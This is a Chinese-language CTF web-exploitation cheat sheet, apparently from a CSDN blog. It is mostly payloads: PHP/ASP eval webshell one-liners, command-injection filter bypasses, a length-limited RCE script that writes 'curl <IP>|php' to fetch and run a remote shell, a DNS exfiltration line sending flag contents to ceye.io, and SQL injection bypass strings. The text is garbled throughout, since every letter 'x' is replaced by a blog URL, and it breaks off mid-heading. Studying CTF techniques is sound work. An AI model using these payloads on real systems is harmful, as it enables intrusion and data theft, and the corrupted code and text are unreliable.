网上似乎没有一篇比较完整的CTF WEB题思路的总结，希望这篇“最全总结”对各位师傅有帮助。

基础

Flag可能出现的位置

网页源代码（注意注释）

数据库中

PHPinfo

靶机中的文件

环境变量

题目要求

XFF/Refer/UA/Cookie/F12( view-source: )/URL/robots.thttps://blog.csdn.net/yjprolus/article/details/xt/响应码/

指纹识别

TideFinger/Bscan/Glass/Arjun/Wappalyzer插件

源码和Http响应信息

HTTP响应文

错误界面(404/302)

源码泄露

git

Githack恢复

查看log后选择性地进行git reset回滚

.git/config可能有access_token信息

SVN

Seay-svn/dvcs-ripper工具

注意wc.db文件存在与否

WEB.INF/web.https://blog.csdn.net/yjprolus/article/details/xml泄露

.DS_Store文件泄漏

.hg泄露：dvcs.ripper工具

CVS泄露

备份文件泄露

gedit：filename ~

vim：vim -r filename.swp/.swo/.swn

www.zip/rar/tar.gz

常用一句话

php

 @eval($_POST['yj']);?>

ASP

<%eval request ("yj")%>

ASPX

<%@ Page Language="Jscript"%><%eval(Request.Item["yj"],"unsafe");%>

jsP

JSP一句话木马 - 简书 (jianshu.com)

shtml

ssi:<--#include file="..\..\web.config" -->

PHP专题

基础

ctfshow web102

= > and #### 内部类 常用`Ehttps://blog.csdn.net/yjprolus/article/details/xception`，其他可用的有 `DirectoryIterator/FilesystemIterator/SplFileObject/GlobIterator/ReflectionClass/ReflectionMethod` ```php // ctfshow web109/web110 eval("echo new $v1($v2());"); // ?v1=Ehttps://blog.csdn.net/yjprolus/article/details/xception&v2=system('tac fl36dg.thttps://blog.csdn.net/yjprolus/article/details/xt') ``` ### 考题中会出现的函数 #### get_defined_vars() 返回由所有已定义变量所组成的数组 #### call_user_func() 函数把第一个参数作为回调函数，其余参数都是回调函数的参数 #### _() 是一个函数 _()等效于gettehttps://blog.csdn.net/yjprolus/article/details/xt() 是gettehttps://blog.csdn.net/yjprolus/article/details/xt()的拓展函数，需要开启tehttps://blog.csdn.net/yjprolus/article/details/xt扩展。`echo gettehttps://blog.csdn.net/yjprolus/article/details/xt("ctfshownb");` `和 echo _("ctfshownb");` 的输出结果都为 ctfshownb #### parse_str() 函数会将传入的第一个参数设置成变量，如果设置了第二参数，则会将第一个参数的变量以数组元素的形式存入到这个数组。 ```php if(isset($_POST['v1'])){ $v1 = $_POST['v1']; $v3 = $_GET['v3']; parse_str($v1,$v2); if($v2['flag']==md5($v3)){ echo $flag; } } // payload GET ?v3=1 & POST:v1=flag=c4ca4238a0b923820dcc509a6f75849b # md5解密后对应1 ``` #### strrev() 反转字符串 #### shell_ehttps://blog.csdn.net/yjprolus/article/details/xec() 缩写为`` #### sprintf() `sprintf(fORMat,arg1,arg2,arg++)`： 把格式化的字符串写入一个变量中。arg1、arg2、arg++ 参数将被插入到主字符串中的百分号（%）符号处。该函数是逐步执行的。在第一个 % 符号处，插入 arg1，在第二个 % 符号处，插入 arg2，依此类推。`%`后的第一个字符，都会被当做字符类型而被吃掉。也就是当做一个类型进行匹配后面的变量。如`%c`匹配ascii码，`%d`匹配整数，如果不在定义中的也会进行匹配，匹配为空。比如`%\`匹配任何参数都为空。 ```php

payload`username = admin%1$' and 1 = 1#`，可以使**单引号逃逸**，导致存在sql盲注。#### mt_rand()`mt_rand(min,mahttps://blog.csdn.net/yjprolus/article/details/x)` ```php 

payload: POST:seed=1&key=1244335972&hello=);system('cat flag.php');echo(0

复杂变量${}

eval('$string = "'.$_GET[cmd].'";');  // payload: http://127.0.0.1/test.php?cmd=${phpinfo()}

file_get_contents()

函数将整个文件或一个url所指向的文件读入一个字符串中

fsockopen()

fsockopen($hostname,$port,$errno,$errstr,$timeout)用于打开一个网络连接或者一个Unihttps://blog.csdn.net/yjprolus/article/details/x 套接字连接，初始化一个套接字连接到指定主机（hostname），实现对用户指定url数据的获取。该函数会使用Socket跟服务器建立tcp连接，进行传输原始数据。 fsockopen()将返回一个文件句柄，之后可以被其他文件类函数调用（例如：fgets()，fgetss()，fwrite()，fclose()还有feof()）。如果调用失败，将返回false。

SoapClient

SoapClient是一个php的内置类，当其进行反序列化时，如果触发了该类中的__call方法，那么__call便方法可以发送HTTP和HTTPS请求。

MD5/SHA1 绕过 // TODO

0e

  sha1('aaroZmOk')//0e66507019969427134894567494305185566735  sha1('aaK1STfY')//0e76658526655756207688271159624026011393  md5('QNKCDZO')//0e830400451993494058024219903391  md5('240610708')//0e462097431906509019562988736854

md5()遇到数组时会警告并且返回null：var_dump(@md5([]) === @md5([])) //bool(true)，即null===null

ffifdyop：SQL注入绕过

$passWord = "ffifdyop";$sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'";var_dump($sql);

弱类型

is_numeric()绕过：33a或者数组（大于任何值）绕过

字符串比较

比较两个字符串，strcmp(string1, string2)不区分大小写，strcasecmp(string1, string2)区分大小写。若string1 > string2，返回> 0；若string1 < string2，返回< 0;若string1 = string2，返回0。该函数无法处理数组，当出现数组时，返回null。var_dump(@strcmp([],'flag') == 0); //bool(true)

intval()

  var_dump(intval('1'));//int(1)  var_dump(intval('1a'));//int(1)  var_dump(intval('1%001'));//int(1)  var_dump(intval('a1'));//int(0)

trim

利用 trim 及 is_numeric 等函数实现的绕过

// %0c1%00$number = "\f1\0";// trim 函数会过滤 \n\r\t\v\0，但不会过滤过滤\f$number_2 = trim($number);var_dump($number_2); // \f1$number_2 = addslashes($number_2);var_dump($number_2);  // \f1// is_numeric 检测的时候会过滤掉 '', '\t', '\n', '\r', '\v', '\f' 等字符// 但是不会过滤 '\0'var_dump(is_numeric($number)); // falsevar_dump(strval(intval($number_2))); // 1var_dump("\f1" == "1"); // true?>

正则式：/e可执行，构造越界 // TODO

ereg()

搜索字符串以匹配模式中给出的正则表达式，函数区分大小写，匹配可以被%00截断绕过

preg_replace() // TODO 慢慢积累

变量覆盖

$$

ehttps://blog.csdn.net/yjprolus/article/details/xtract()函数

ehttps://blog.csdn.net/yjprolus/article/details/xtract(array, ehttps://blog.csdn.net/yjprolus/article/details/xtract_rules, prefihttps://blog.csdn.net/yjprolus/article/details/x)使用数组键名作为变量名，使用数组键值作为变量值。针对数组中每个元素，将在当前符号表中创建一个对应的变量

 <?php $flag = 'aaa'; ehttps://blog.csdn.net/yjprolus/article/details/xtract($_GET); if (isset($gift)) { $content = trim(file_get_contents($flag)); if ($gift == $content) { echo 'flag{yjprolus}'; } else { echo 'no flag'; } }  ?>     // payload： GET：?flag=&gift=  // ehttps://blog.csdn.net/yjprolus/article/details/xtract()会将flag和gift的值覆盖为空。$content = file_get_contens()的文件为空或不存在时则返回空值（会出现警告），即可以满足条件$gift == $content。

parse_str()

 parse_str("name=Peter&age=43",$myArray);  print_r($myArray);  //Array ( [name] => Peter [age] => 43 )

// TODO 再写几道例题

import_request_variables()

import_request_variables() 函数将 get／post／cookie 变量导入到全局作用域中。如果你禁止了 reGISter_globals，但又想用到一些全局变量，那么此函数就很有用。该函数在最新版本的 php 中已经不支持

似乎没啥考点这个函数，可参考 CTF——PHP审计——变量覆盖_Captain Hammer的博客-CSDN博客_foreach ($_get as $key => $value)

开启了全局变量注册

其他

• call_user_func(array($ctfshow, ‘getFlag’)); 等于 ctfshow::getFlag （执行ctfshow类中静态方法getFlag）

• $cmd=$_GET['cmd'];if(preg_match('/^php$/im', $cmd)){           # /i表示不区分大小写，/m表示多行匹配    if(preg_match('/^php$/i', $cmd)){        # 字符 ^ 和 $ 同时使用时，表示精确匹配         echo 'hacker';    }}payload：?cmd=aaa%0aphp            # %0a为换行符，这样是两行

• // TODO ctfshow web123 

• // ctfshow web147if(isset($_POST['ctf'])){    $ctfshow = $_POST['ctf'];    if(!preg_match('/^[a-z0-9_]*$/isD',$ctfshow)) {        $ctfshow('',$_GET['show']);    }}// GET部分原理如下    function f($dotast){        echo 111;    }    phpinfo();//}

  payload:

  GET ?show=echo 123;}system("tac flag.php");//

  POST ctf=\create_function （\为PHP默认命名空间，\phpinfo即为直接调用该函数）

命令执行

相关函数

命令执行

• system()

  #string system ( string $command [, int &$return_var ] )#system()函数执行有回显，将执行结果输出到页面上<?phpsystem("whoami");?>

• ehttps://blog.csdn.net/yjprolus/article/details/xec()

  echo ehttps://blog.csdn.net/yjprolus/article/details/xec("whoami");?>

• popen()

  #resource popen ( string $command , string $mode )#函数需要两个参数，一个是执行的命令command，另外一个是指针文件的连接模式mode，有r和w代表读#和写。函数不会直接返回执行结果，而是返回一个文件指针，但是命令已经执行<?php popen( 'whoami >> c:/1.thttps://blog.csdn.net/yjprolus/article/details/xt', 'r' ); ?><?php  $test = "ls /tmp/test";  $fp = popen($test,"r");  //popen打一个进程通道    while (!feof($fp)) {      //从通道里面取得东西   $out = fgets($fp, 4096);   echo  $out;         //打印出来  }  pclose($fp);  ?> 

• proc_open()

  resource proc_open ( string $cmd , array $descriptorspec , array &$pipes [, string $cwd [, array $env [, array $other_options ]]] )#与Popen函数类似，但是可以提供双向管道<?php  $test = "ipconfig";  $array =   array(   array("pipe","r"),   //标准输入   array("pipe","w"),   //标准输出内容   array("pipe","w")    //标准输出错误   );    $fp = proc_open($test,$array,$pipes);   //打开一个进程通道  echo stream_get_contents($pipes[1]);    //为什么是$pipes[1]，因为1是输出内容  proc_close($fp);  ?> 

• passthru()

  #void passthru ( string $command [, int &$return_var ] )<?phppassthru("whoami");?>

• shell_ehttps://blog.csdn.net/yjprolus/article/details/xec()

  #string shell_ehttps://blog.csdn.net/yjprolus/article/details/xec( string &command)<?phpecho shell_ehttps://blog.csdn.net/yjprolus/article/details/xec("whoami");?>

• 反引号 `

  #shell_ehttps://blog.csdn.net/yjprolus/article/details/xec() 函数实际上仅是反撇号 (`) 操作符的变体，当禁用shell_ehttps://blog.csdn.net/yjprolus/article/details/xec时，` 也不可执行<?phpecho `whoami`;?>

• pcntl_ehttps://blog.csdn.net/yjprolus/article/details/xec()

  #void pcntl_ehttps://blog.csdn.net/yjprolus/article/details/xec ( string $path [, array $args [, array $envs ]] )#path是可执行二进制文件路径或一个在文件第一行指定了 一个可执行文件路径标头的脚本#args是一个要传递给程序的参数的字符串数组。#pcntl是linuhttps://blog.csdn.net/yjprolus/article/details/x下的一个扩展，需要额外安装，可以支持 php 的多线程操作。#pcntl_ehttps://blog.csdn.net/yjprolus/article/details/xec函数的作用是在当前进程空间执行指定程序，版本要求：PHP > 4.2.0<?php pcntl_ehttps://blog.csdn.net/yjprolus/article/details/xec ( "/bin/bash" , array("whoami"));?>

代码注入

• eval()

  #传入的参数必须为PHP代码，既需要以分号结尾。#命令执行：cmd=system(whoami);#菜刀连接密码：cmd<?php @eval($_POST['cmd']);?>

• assert()

  #assert函数是直接将传入的参数当成PHP代码直接，不需要以分号结尾，当然你加上也可以。#命令执行：cmd=system(whoami)#菜刀连接密码：cmd<?php @assert($_POST['cmd'])?>

• preg_replace()

  #preg_replace('正则规则','替换字符'，'目标字符')#执行命令和上传文件参考assert函数(不需要加分号)。#将目标字符中符合正则规则的字符替换为替换字符，此时如果正则规则中使用/e修饰符，则存在代码执行漏洞。preg_replace("/test/e",$_POST["cmd"],"jutst test");

• create_function()

  #创建匿名函数执行代码#执行命令和上传文件参考eval函数(必须加分号)。#菜刀连接密码：cmd$func =create_function('',$_POST['cmd']);$func();

• array_map()

  #array_map() 函数将用户自定义函数作用到数组中的每个值上，并返回用户自定义函数作用后的带有新值的数组。 回调函数接受的参数数目应该和传递给 array_map() 函数的数组数目一致。#命令执行http://localhost/123.php?func=system   cmd=whoami#菜刀连接http://localhost/123.php?func=assert   密码：cmd$func=$_GET['func'];$cmd=$_POST['cmd'];$array[0]=$cmd;$new_array=array_map($func,$array);echo $new_array;

• call_user_func()

  #传入的参数作为assert函数的参数#cmd=system(whoami)#菜刀连接密码：cmdcall_user_func("assert",$_POST['cmd']);

• call_user_func_array()

  #将传入的参数作为数组的第一个值传递给assert函数#cmd=system(whoami)#菜刀连接密码：cmd$cmd=$_POST['cmd'];$array[0]=$cmd;call_user_func_array("assert",$array);

• array_filter()

  #用回调函数过滤数组中的元素：array_filter(数组,函数)#命令执行func=system&cmd=whoami#菜刀连接http://localhost/123.php?func=assert  密码cmd$cmd=$_POST['cmd'];$array1=array($cmd);$func =$_GET['func'];array_filter($array1,$func);

• uasort()

  #php环境>=<5.6才能用#uasort() 使用用户自定义的比较函数对数组中的值进行排序并保持索引关联 。#命令执行：http://localhost/123.php?1=1+1&2=eval($_GET[cmd])&cmd=system(whoami);#菜刀连接：http://localhost/123.php?1=1+1&2=eval($_POST[cmd])   密码：cmdusort($_GET,'asse'.'rt');

绕过方式

空格

#常见的绕过符号有：$IFS$9 、${IFS} 、%09(php环境下)、 重定向符<>、<、#$IFS在linuhttps://blog.csdn.net/yjprolus/article/details/x下表示分隔符，如果不加{}则bash会将IFS解释为一个变量名，加一个{}就固定了变量名，$IFS$9后面之所以加个$是为了起到截断的作用

命令分隔符

%0a  #换行符，需要php环境%0d  #回车符，需要php环境;    #在 shell 中，是”连续指令”&    #不管第一条命令成功与否，都会执行第二条命令&&   #第一条命令成功，第二条才会执行|    #第一条命令的结果，作为第二条命令的输入||   #第一条命令失败，第二条才会执行

关键字

假如过滤了关键字cat\flag，无法读取不了flag.php，又该如何去做

• 拼接绕过

  #执行ls命令：a=l;b=s;$a$b#cat flag文件内容：a=c;b=at;c=f;d=lag;$a$b ${c}${d}#cat test文件内容a="ccaatt";b=${a:0:1}${a:2:1}${a:4:1};$b test

• 编码绕过

  #base64echo "Y2F0IC9mbGFn"|base64 -d|bash  ==> cat /flagecho Y2F0IC9mbGFn|base64 -d|sh      ==> cat /flag#hehttps://blog.csdn.net/yjprolus/article/details/xecho "0https://blog.csdn.net/yjprolus/article/details/x636174202f666c6167" | https://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/xd -r -p|bash   ==> cat /flag#oct/字节$(printf "\154\163") ==>ls$(printf "\https://blog.csdn.net/yjprolus/article/details/x63\https://blog.csdn.net/yjprolus/article/details/x61\https://blog.csdn.net/yjprolus/article/details/x74\https://blog.csdn.net/yjprolus/article/details/x20\https://blog.csdn.net/yjprolus/article/details/x2f\https://blog.csdn.net/yjprolus/article/details/x66\https://blog.csdn.net/yjprolus/article/details/x6c\https://blog.csdn.net/yjprolus/article/details/x61\https://blog.csdn.net/yjprolus/article/details/x67") ==>cat /flag{printf,"\https://blog.csdn.net/yjprolus/article/details/x63\https://blog.csdn.net/yjprolus/article/details/x61\https://blog.csdn.net/yjprolus/article/details/x74\https://blog.csdn.net/yjprolus/article/details/x20\https://blog.csdn.net/yjprolus/article/details/x2f\https://blog.csdn.net/yjprolus/article/details/x66\https://blog.csdn.net/yjprolus/article/details/x6c\https://blog.csdn.net/yjprolus/article/details/x61\https://blog.csdn.net/yjprolus/article/details/x67"}|\$0 ==>cat /flag#i也可以通过这种方式写马#内容为${printf,"\74\77\160\150\160\40\100\145\166\141\154\50\44\137\120\117\123\124\133\47\143\47\135\51\73\77\76"} >> 1.php

• 单引号和双引号绕过

  c'a't testc"a"t test

• 反斜杠绕过

  ca\t test

• 通过$PATH绕过

  #echo $PATH 显示当前PATH环境变量，该变量的值由一系列以冒号分隔的目录名组成#当执行程序时，shell自动跟据PATH变量的值去搜索该程序#shell在搜索时先搜索PATH环境变量中的第一个目录，没找到再接着搜索，如果找到则执行它，不会再继续搜索echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin`echo $PATH| cut -c 8,9`t test

• 通配符绕过

  1. […]表示匹配方括号之中的任意一个字符
  2. {…}表示匹配大括号里面的所有模式，模式之间使用逗号分隔。
  3. {…}与[…]有一个重要的区别，当匹配的文件不存在，[…]会失去模式的功能，变成一个单纯的字符串，而{…}依然可以展开

  cat t?stcat te*cat t[a-z]stcat t{a,b,c,d,e,f}st

限制长度

>a    #虽然没有输入但是会创建a这个文件ls -t    #ls基于基于事件排序（从晚到早）sh a    #sh会把a里面的每行内容当作命令来执行使用|进行命令拼接    #l\ s    =    lsbase64    #使用base64编码避免特殊字符

• 七字符限制

  w>hpw>1.p\\w>d\>\\w>\ -\\w>e64\\w>bas\\w>7\|\\w>XSk\\w>Fshttps://blog.csdn.net/yjprolus/article/details/x\\w>dFV\\w>kX0\\w>bCg\\w>XZh\\w>AgZ\\w>waH\\w>PD9\\w>o\ \\w>ech\\ls -t|\sh

  翻译过来就是

  echo PD9waHAgZXZhbCgkX0dFVFshttps://blog.csdn.net/yjprolus/article/details/xXSk7 | base64 -d > 1.php

  脚本代码

  import requests url = "http://192.168.1.100/rce.php?1={0}"print("[+]start attack!!!")with open("payload.thttps://blog.csdn.net/yjprolus/article/details/xt","r") as f:for i in f:print("[*]" + url.format(i.strip()))requests.get(url.format(i.strip())) #检查是否攻击成功test = requests.get("http://192.168.61.157/1.php")if test.status_code == requests.codes.ok:print("[*]Attack success!!!")

• 四字符限制

  #-*-coding:utf8-*-import requests as rfrom time import sleepimport randomimport hashlibtarget = 'http://52.197.41.31/' # 存放待下载文件的公网主机的IPshell_ip = 'https://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/x.https://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/x.https://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/x.https://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/x' # 本机IPyour_ip = r.get('http://ipv4.icanhazip.com/').tehttps://blog.csdn.net/yjprolus/article/details/xt.strip() # 将shell_IP转换成十六进制ip = '0https://blog.csdn.net/yjprolus/article/details/x' + ''.join([str(hehttps://blog.csdn.net/yjprolus/article/details/x(int(i))[2:].zfill(2))                     for i in shell_ip.split('.')]) reset = target + '?reset'cmd = target + '?cmd='sandbohttps://blog.csdn.net/yjprolus/article/details/x = target + 'sandbohttps://blog.csdn.net/yjprolus/article/details/x/' +     hashlib.md5('orange' + your_ip).hehttps://blog.csdn.net/yjprolus/article/details/xdigest() + '/' # payload某些位置的可选字符pos0 = random.choice('efgh')pos1 = random.choice('hkpq')pos2 = 'g'  # 随意选择字符 payload = [    '>dir',    # 创建名为 dir 的文件     '>%s>' % pos0,    # 假设pos0选择 f , 创建名为 f> 的文件     '>%st-' % pos1,    # 假设pos1选择 k , 创建名为 kt- 的文件,必须加个pos1，    # 因为alphabetical序中t>s     '>sl',    # 创建名为 >sl 的文件；到此处有四个文件，    # ls 的结果会是：dir f> kt- sl     '*>v',    # 前文提到， * 相当于 `ls` ，那么这条命令等价于 `dir f> kt- sl`>v ，    #  前面提到dir是不换行的，所以这时会创建文件 v 并写入 f> kt- sl    # 非常奇妙，这里的文件名是 v ，只能是v ，没有可选字符     '>rev',    # 创建名为 rev 的文件，这时当前目录下 ls 的结果是： dir f> kt- rev sl v     '*v>%s' % pos2,    # 魔法发生在这里： *v 相当于 rev v ，* 看作通配符。前文也提过了，体会一下。    # 这时pos2文件，也就是 g 文件内容是文件v内容的反转： ls -tk > f     # 续行分割 curl 0https://blog.csdn.net/yjprolus/article/details/x11223344|php 并逆序写入    '>p',    '>ph\',    '>|\',    '>%s\' % ip[8:10],    '>%s\' % ip[6:8],    '>%s\' % ip[4:6],    '>%s\' % ip[2:4],    '>%s\' % ip[0:2],    '> \',    '>rl\',    '>cu\',     'sh ' + pos2,    # sh g ;g 的内容是 ls -tk > f ，那么就会把逆序的命令反转回来，    # 虽然 f 的文件头部会有杂质，但不影响有效命令的执行    'sh ' + pos0,    # sh f 执行curl命令，下载文件，写入木马。] s = r.get(reset)for i in payload:    assert len(i) <= 4    s = r.get(cmd + i)    print '[%d]' % s.status_code, s.url    sleep(0.1)s = r.get(sandbohttps://blog.csdn.net/yjprolus/article/details/x + 'fun.php?cmd=uname -a')print '[%d]' % s.status_code, s.urlprint s.tehttps://blog.csdn.net/yjprolus/article/details/xt

限制回显

• 判断

  #利用sleep判断ls;sleep 3#http请求/dns请求http://ceye.io/payloads

• 利用

  #写shell(直接写入/外部下载)echo >wget#http/dns等方式带出数据#需要去掉空格，可以使用sed等命令echo `cat flag.php|sed s/[[:space:]]//`.php.https://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/x.ceye.io

无字母、数字getshell

异或

$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';$___=$$__;$_($___[_]); // assert($_POST[_]);

简短写法

"`{{{"^"?<>/"   //_GET

取反

$__=('>'>'<')+('>'>'<');//$__2$_=$__/$__;//$_1$____='';$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});//$____=assert$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});//$_____=_POST$_=$$_____;//$_=$_POST$____($_[$__]);//assert($_POST[2])

简短写法

${~"\https://blog.csdn.net/yjprolus/article/details/xa0\https://blog.csdn.net/yjprolus/article/details/xb8\https://blog.csdn.net/yjprolus/article/details/xba\https://blog.csdn.net/yjprolus/article/details/xab"} //$_GET

自增

$_=[];$_=@"$_"; // $_='Array';$_=$_['!'=='@']; // $_=$_[0];$___=$_; // A$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__; // S$___.=$__; // S$__=$_;$__++;$__++;$__++;$__++; // E $___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T$____.=$__;$_=$$____;$___($_[_]); // ASSERT($_POST[_]);

实例

include'flag.php';if(isset($_GET['code'])){   $code=$_GET['code'];   if(strlen($code)>50){       die("Too Long.");  }   if(preg_match("/[A-Za-z0-9_]+/",$code)){       die("Not Allowed.");  }   @eval($code);}else{   highlight_file(__FILE__);}//$hint = "php function getFlag() to get flag";?> 

payload:

code=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);&_=getFlag

$_="{{{"^"?<>/";=$_="GET";
${$_}[_](${$_}[__]);=$_GET[_]($_GET[__]);=getFlag($_GET[__])=getFlag(null);
这个 payload 的长度是 37 ，符合题目要求的 小于等于40 。另fuzz 出了长度为 28 的 payload ，如下：

$_="{{{{{{{"^"%1c%1e%0f%3D%17%1a%1c";$_();#getFlag()

容器和框架漏洞

Nginhttps://blog.csdn.net/yjprolus/article/details/x

IIS

PUT上传漏洞

远程溢出漏洞

短文件漏洞

Apache

HTTP组件提权 CVE-2019-0211

CGI

PHP

ThinkPHP

反序列化

ThinkPHP6.0.12LTS反序列漏洞分析

RCE

Thinkphp5 RCE总结

SQL注入

Discuz

Twig

WordPress

Laravel

Smarty

Java

Struts2

OGNL注入

spring框架

SPEL注入

组件漏洞

fastJSON

反序列化

Hessian

二进制（ObjectOutputStream）

JSON

XML

YAML

JRMP安全性问题

Jwt攻击

敏感信息泄露

将算法修改为none

密钥混淆攻击

无效签名

暴力破解密钥

密钥泄露

操纵KID

操纵头部参数

javascript

SSJI（服务端JavaScript注入）

node.js

vue.js

JavaScript Prototype 污染攻击

python

沙箱逃逸

利用内建函数执行命令

过滤与bypass

框架

flask

敏感信息泄露

验证码绕过

SESSION伪造和对象注入漏洞

使用hash而非hMac进行签名（Hash长度拓展攻击）

任意文件读取

加密而未签名（CBC字节翻转攻击）

Tornado

Django

反序列化漏洞

pickle模块

Ruby

ERB模板注入

SQL注入

原理

用户输入的内容传到web应用，没有经过过滤或者严格的过滤，被带入到了数据库中进行执行

分类

联合注入

几大基本步骤

判断是否有注入及注入点类型

是否有注入

• 加单引号
• and 8731=8731
• and ‘a’=‘a’
• and 1=2
• or 1=1
• or 1=2

注入点类型

• 字符型

  • ‘
  • “
  • ’）
  • ”）
  • %‘

• 数字型

判断查询列数

注意

• uNIOn 前后两个select语句的列数要一致

原理

• order by是排序的语句

  • select * from users order by id（默认升序）
  • select * from users order by id desc（降序）
  • select * from users order by 1

order by n

联合查询

union

• id=1’ union select 1,2,3–+
• id=-1’ union select 1,2,3–+

获取基本信息

version()

• 获取数据库的版本

database()

• 获取当前网站使用的数据库

user()

• 当前网站使用的数据库账号

@@secure_file_priv

• 数据库的读写文件

@@datadir

• 数据库的安装目录

  • phpstudy

    • c:\phpstudy\Mysql
    • c:\phpstudy\www

  • wamp

    • c:\wamp\mysql
    • c:\wamp\www

  • 宝塔

    • /www/server/data（Linuhttps://blog.csdn.net/yjprolus/article/details/x版）
    • 宝塔系统目录结构

获取数据库名

information_schema数据库

• schemata数据表
• tables数据表
• columns数据表

schemata数据表里面获取数据库名

• select schema_name from schemata;
• id=1’ union select 1,2,group_concat(schema_name) from information_schema.schemata

获取数据表名

tables表

• select table_name from tables where table_schema=‘security’;
• select table_name from tables where table_schema=database();
• id=1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

获取列名

columns表

• select column_name from columns where table_schema=‘security’ and table_name=‘users’;

优化步骤

select table_name,column_name from columns where table_schema=‘security’;###### id=1’ union select 1,2,group_concat(table_name,‘_’,column_name) from information_schema.columns where table_schema=database()

获取数据

md5破解的做法（暴力枚举）

报错注入

几个函数

updatehttps://blog.csdn.net/yjprolus/article/details/xml/ehttps://blog.csdn.net/yjprolus/article/details/xtractvalue

报错的原理

• 构造不满足https://blog.csdn.net/yjprolus/article/details/xpath语法的内容

报错的语句

• id=1’ and ehttps://blog.csdn.net/yjprolus/article/details/xtractvalue(1,concat(0https://blog.csdn.net/yjprolus/article/details/x7e,(select user()),0https://blog.csdn.net/yjprolus/article/details/x7e))

注意

• 版本限制

• 32位长度限制

  • substr

其他函数

布尔盲注

步骤

获取数据库名

判断有多少个数据库

• count()

判断第一个数据库名的长度

• length()

获取第一个每一位数据库名字的字符

• substr()
• ascii()

判断第二个数据库名的长度

获取第二个数据库每一位数据库名字的字符

获取数据表名

判断数据库里面有多少个数据表

判断第一个数据库的长度

取第一个数据表的每一位字符

获取列名

获取数据

时间盲注

原理

发送一个请求，网站接受请求，并发送到数据库执行相关的操作，等待数据库返回结果，人为的延长数据库的执行时间，判断是否有注入

步骤

同布尔盲注

if(判断条件,条件为真时返回的值,条件为假时返回的值)

sleep()

benchmark()

堆叠注入

mysqli_query()不支持 VS mysqli_muiti_query()支持

语法

select * from users;create table you(id int);

id=1’;create table you(id int);#

内联注入

子查询

select (select 1)

区别

应用范围

时间盲注>布尔盲注>报错注入=联合注入

利用便捷度

联合注入>报错注入>布尔盲注>时间盲注

利用点

select - 四种基本注入

update- 联合注入不行

insert - 联合注入不行

delete - 联合注入不行

limit之后的注入

order by之后的注入

GET

POST

HTTP Header

Cookie

Referer

User-Agent

绕过

过滤and or

or     ——>   ||and     ——>   &&https://blog.csdn.net/yjprolus/article/details/xor——>|  not——>!十六进制绕过or ——> o\https://blog.csdn.net/yjprolus/article/details/x72大小写绕过OraNd双写绕过oorrananddurlencode，ascii(char)，hehttps://blog.csdn.net/yjprolus/article/details/x，unicode编码绕过一些unicode编码举例：单引号：'%u0027 %u02b9 %u02bc%u02c8 %u2032%uff07 %c0%27%c0%a7 %e0%80%a7关键字内联注释尝试绕所有

左括号过滤

urlencode，ascii(char)，hehttps://blog.csdn.net/yjprolus/article/details/x，unicode编码绕过%u0028 %uff08%c0%28 %c0%a8%e0%80%a8

右括号过滤

urlencode，ascii(char)，hehttps://blog.csdn.net/yjprolus/article/details/x，unicode编码绕过%u0029 %uff09%c0%29 %c0%a9%e0%80%a9

过滤union\select

逻辑绕过例：过滤代码 union select user,password from users绕过方式 1 && (select user from users where userid=1)='admin'十六进制字符绕过select ——> selec\https://blog.csdn.net/yjprolus/article/details/x74union——>unio\https://blog.csdn.net/yjprolus/article/details/x6e大小写绕过SelEct双写绕过selselectectuniuniononurlencode，ascii(char)，hehttps://blog.csdn.net/yjprolus/article/details/x，unicode编码绕过关键字内联绕所有

过滤空格

用Tab代替空格%20 %09 %0a %0b %0c %0d %a0 ()绕过空格注释符绕过//--%20#--+-- -;%00;空白字符绕过SQLite3 ——     0A,0D,0c,09,20MYSQL09,0A,0B,0B,0D,A0,20PosgressSQL0A,0D,0C,09,20oracle_11g00,0A,0D,0C,09,20MSSQL01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,OF,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20特殊符号绕过` + ！等科学计数法绕过例：select user,password from users where user_id0e1union select 1,2unicode编码%u0020 %uff00%c0%20 %c0%a0 %e0%80%a0

过滤=

